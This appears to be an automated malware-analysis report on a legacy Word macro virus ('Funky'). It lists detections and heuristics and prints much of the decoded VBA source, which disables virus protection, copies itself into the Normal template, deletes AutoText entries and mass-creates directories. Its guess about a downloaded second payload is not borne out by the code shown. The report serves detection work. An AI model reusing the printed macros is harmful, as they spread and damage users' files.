Verdict: MALICIOUS

Risk Score: 320

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains legacy WordBasic and VBA macros, including a Document_Open macro that disables virus protection and calls other subroutines. The presence of 'Doc.Dropper.Agent-6961836-0' and 'Win.Trojan.C-286' detections from ClamAV strongly suggests a dropper functionality. The macros likely attempt to download and execute a secondary payload, a common tactic for this type of malware.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6961836-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6961836-0
- Embedded Office document has suspicious static findings [critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE]: A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- OLE document has large unaccounted-for region [high, OLE_SLACK_ANOMALY]: OLE file is 26,112 bytes but its declared streams total only 0 bytes; 26,112 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected [medium, OLE_VBA_MACROS; 1 related finding]: Document contains VBA macro code
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- CFB header with no readable streams [medium, OLE_PARSE_EMPTY_STREAMS]: The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous; it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28255 bytes | 1df8e211c1b74b73ed0a5c5ec4771da322e7b936b722d1763cb7c00e75b3e736 |

Detection for macros.bas: ClamAV Win.Trojan.C-286; obfuscation or payload: unlikely.

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
    On Error GoTo dnew
    Call copyfromtempl
dnew:
    Exit Sub
End Sub
Private Sub Document_Open()
    On Error GoTo Dopen
    With Options
        .VirusProtection = False
    End With
    Call copyfromtempl
    Call copytotempl
Dopen:
    Exit Sub
End Sub
Attribute VB_Name = "Funky"
Option Explicit
Public templpath, docouname, docname As String
Public autentriesn
Public autentriest
Public uname
Public newdirc, lengthdirc, NPath
Public w, x, z, y, doccount, projcount As Integer
Public mytemplate As Template
Const Funkydate = "13/ 08 / 99"
Public lengthn
Public fnamet, fnamet2, fnamed, fnamed2 As String
Sub Autoexec()
    On Error GoTo exitsub
    Application.Documents.Add
    doccount = Application.Documents.Count
    If doccount = 1 Then
        GoTo copyto
    ElseIf doccount > 1 Then
        Normal.ThisDocument.ActiveWindow.Activate
    End If
copyto:
    Call copytotempl
    Call copyfromtempl
Funkyday:
    If Now() = Funkydate Or Now() > Funkydate Then
        GoTo Funkystart
    Else
        GoTo exitsub
    End If
Funkystart:
    Call pagelay
    Set mytemplate = ActiveDocument.AttachedTemplate
    If mytemplate.AutoTextEntries.Count = 0 Then
        For z = 1000 To 1 Step -1
            Call newdir
        Next z
        Exit Sub
    Else
        For x = mytemplate.AutoTextEntries.Count To 1 Step -1
            autentriesn = mytemplate.AutoTextEntries(x).Name
            autentriest = mytemplate.AutoTextEntries(x).Value
            Call Templatepath
            Call dircreate
            mytemplate.AutoTextEntries(x).Delete
            If mytemplate.AutoTextEntries.Count = 0 Then
                GoTo Message
            End If
        Next x
    End If
    Exit Sub
exitsub:
    Exit Sub
Message:
    Call sname
    MsgBox "Hi, " & "< " & uname & " >" & Chr(13) & Chr(10) & Chr(13) & Chr(10) & "Sorry, did you say there are no more Autotext Entries? " & Chr(13) & Chr(10) & "Never mind, you should have enough information to replace it." & Chr(13) & Chr(10) & "Take a look at your Templates directory !!!", vbCritical, "Wipe-out !!!"
    GoTo exitsub
End Sub
Sub Templatepath()
    On Error GoTo exitsub
    templpath = Options.DefaultFilePath(Path:=wdUserTemplatesPath)
    If templpath = "" Then
        templpath = "c:\office97\templates"
        MkDir templpath
    Else
        templpath = Options.DefaultFilePath(Path:=wdUserTemplatesPath)
    End If
    Open templpath & "\Tpath.txt" For Output As 1#
    Write #1, templpath
    Close #1
exitsub:
End Sub
Sub dircreate()
    On Error GoTo ending
    lengthn = Len(autentriesn)
    autentriesn = Trim(Mid(autentriesn, 1, lengthn - 1))
    MkDir templpath & "\" & autentriesn
    Open templpath & "\" & autentriesn & "\" & autentriesn & ".txt" For Output As 1#
    Write #1, autentriest
    Close #1
ending:
End Sub
Sub sname()
    On Error GoTo exitsub
    uname = Application.UserName
exitsub:
End Sub
Sub pagelay()
    On Error GoTo exitsub
    If ActiveWindow.View.SplitSpecial = wdPaneNone Then
        ActiveWindow.ActivePane.View.Type = wdPageView
    Else
        ActiveWindow.View.Type = wdPageView
    End If
exitsub:
End Sub
Sub newdir()
    On Error GoTo wrfile
    Call Templatepath
    Open templpath & "\Tpath.txt" For Input As #1
    Do While Not EOF(1)
        Input #1, newdirc
    Loop
    Close #1
    lengthdirc = Len(newdirc)
    newdirc = Trim(Mid(newdirc, 1, lengthdirc))
    NPath = Trim(Mid(newdirc, 4, lengthdirc))
    MkDir newdirc & (z)
exitsub:
    Exit Sub
wrfile:
    Call errdircreate
    GoTo exitsub
End Sub
Sub errdircreate()
    On Error GoTo endnow
    Open newdirc & (z) &
```

... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| embedded_office_off00004000.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x4000 | 26112 bytes | 4f83fa8da6a632776fba68b7f3e1ce99398743494427ab5e14a21b1685d8809f |